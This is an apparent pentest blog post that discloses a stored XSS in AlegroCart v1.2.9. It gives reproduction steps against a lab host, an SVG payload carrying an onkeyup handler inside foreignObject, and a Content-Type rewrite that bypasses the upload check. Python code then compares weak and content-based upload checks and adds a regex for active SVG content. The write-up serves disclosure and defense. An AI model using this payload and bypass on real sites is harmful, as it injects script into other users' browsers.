Wednesday, 30 April 2025

Friday Fun Pentest Series - 22 - XSS via SVG Image Upload - alegrocartv1.2.9

Description

-  It was noted that the image upload functionality was vulnerable to stored XSS: a specially crafted SVG file is accepted once the declared Content-Type of the upload is changed to that of a JPEG, and the file is then served from /alegrocart/download/, where its markup executes in the browser of anyone who opens it


XSS via SVG Image Upload

Steps to Reproduce:

  1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
  2. Upload an SVG file named xss.svg with the contents below
  3. Intercept the POST request and change the Content-Type of the file part in the multipart body to "image/jpg", leaving the .svg filename as it is; the upload is then accepted and stored under its original name
  4. Then visit http://192.168.58.129/alegrocart/download/xss.svg to trigger the XSS. The file must be opened directly as a document (browsers do not run script in an SVG embedded via an img tag), and the handler is onkeyup, so it fires once the victim types in the rendered input field. Note that the payload contains no script element: the XHTML body inside foreignObject carries the handler, so a filter that only strips script tags does not stop it

<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>
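The Python below is an added example and is not AlegroCart's code. It shows what step 3 actually changes in the multipart request, why an upload check keyed on that declared Content-Type is bypassed by it, and what a content-based check does with the same file. The check functions, the multipart boundary and field name, and the JPEG sample bytes are all constructed for the example; the SVG payload is the one from the post.

```python
import re

# Constructed: the same payload as in the post. No <script> element is needed;
# the XHTML <input> inside <foreignObject> carries the handler.
SVG_PAYLOAD = b"""<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>
"""

# Constructed minimal JPEG: only the SOI/APP0 header matters for the sniff below.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32


def build_multipart(field, filename, declared_type, data, boundary="----pentest7f3a"):
    """Multipart body as the browser sends it, with the file part's Content-Type
    set to declared_type. Step 3 in the post is exactly this edit: the filename
    stays xss.svg but the part declares image/jpg. Returns (header value, body).
    Field name and boundary are assumptions for the example."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {declared_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


ALLOWED_DECLARED = {"image/jpeg", "image/jpg", "image/png", "image/gif"}

def weak_check(filename, declared_type, data):
    """Hypothetical check that trusts the client-supplied part Content-Type.
    Once that header is rewritten in the proxy any file is accepted."""
    return declared_type in ALLOWED_DECLARED


MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
)
EXT_TO_MIME = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif"}

def sniff_type(data):
    """Type derived from content, ignoring whatever the client declared. Leading
    bytes are enough to tell an SVG/XML document from a raster image."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    head = data.lstrip()[:1024].lower()
    if head.startswith((b"<?xml", b"<svg", b"<!doctype")):
        return "image/svg+xml" if b"<svg" in head else "application/xml"
    return None

def strong_check(filename, declared_type, data):
    """Ignores declared_type entirely: the sniffed type must be a raster image
    and must agree with the extension the file is stored and served under."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    sniffed = sniff_type(data)
    return sniffed is not None and EXT_TO_MIME.get(ext) == sniffed


ACTIVE_SVG = re.compile(
    rb"<\s*(script|foreignobject|iframe|embed|object|use|set|animate)\b"
    rb"|\son[a-z]+\s*="            # on* event handler attributes
    rb"|javascript:",
    re.IGNORECASE,
)

def svg_has_active_content(data):
    """If SVG must be accepted at all, this is a minimum pre-filter (not a
    sanitizer) to apply before storing. The post's payload trips it on
    <foreignObject> and onkeyup= even though it contains no <script>."""
    return ACTIVE_SVG.search(data) is not None
```

The regex pre-filter is deliberately broad; if SVG uploads are a requirement, the safer design is to run a real SVG sanitizer and to serve user-supplied SVG with Content-Disposition: attachment and a restrictive Content-Security-Policy, so that a file which slips through is never rendered as a document in the application's origin.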

